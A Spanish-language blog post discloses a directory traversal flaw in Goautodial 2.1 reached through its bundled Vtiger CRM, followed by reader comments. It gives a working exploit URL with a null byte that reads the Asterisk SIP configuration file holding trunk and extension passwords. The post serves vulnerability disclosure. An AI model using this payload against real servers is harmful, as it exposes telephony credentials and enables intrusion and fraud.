Vulnerabilidad de directorios transversales en Goautodial 2.1
Como saben este famoso software de marcación predictiva, trae Vtiger como software para CRM, por defecto, ultimamente estoy trabajando mucho con este software, así que, como siempre no esta demás probar, como dirían los colegas «las fijas».
A través de Vtiger, es posible explotar una vulnerabilidad que permite visualizar los archivos locales del servidor goautodial, mediante la manipulación de URL , esto sucede en Goautodial 2.1 , aquí algunos ejemplos.
1.- Detectando Vtiger en Goautodial 2.1
2.- Explotando la vulnerabilidad , visualizando el archivo de troncales, extensiones y contraseñas
URL : http://IP/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/sip-vicidial.conf%00
Si bien es cierto, esta es una vulnerabilidad ya reportada en vtiger (http://osvdb.org/show/osvdb/80552) , al parecer la gente de Goautodial aun no corrige la versión.
Bueno espero les sirva la información y a tomar sus recaudos
UPDATE 20/03/2014
Hace poco me hicieron una entrevista en donde, me filmaron haciendo una demostración de esta vulnerabilidad , a continuación les comparto el vídeo:
Juan Oliva 
I enjoyed having a look at this Blog.
Free Software has really been making or performing a new school and opening mind for free Software Technology.
Either we get along and try to work in community, or new challenges will make us face hard failure.
Congratulations for your initiatives and courage to start helping people to develop their own devices on Linux, Open Source.
Go ahead supporting new discoveries and new way to see the New World.
Stark
Thank you very much!!
Regards
Juan Oliva
hola bro que tal como estas una pregunta cual es su correo electronico muchas gracias
Hola Armitage1989
Mi correo y hangout es jroliva at gmail.com
Saludos
Juan Oliva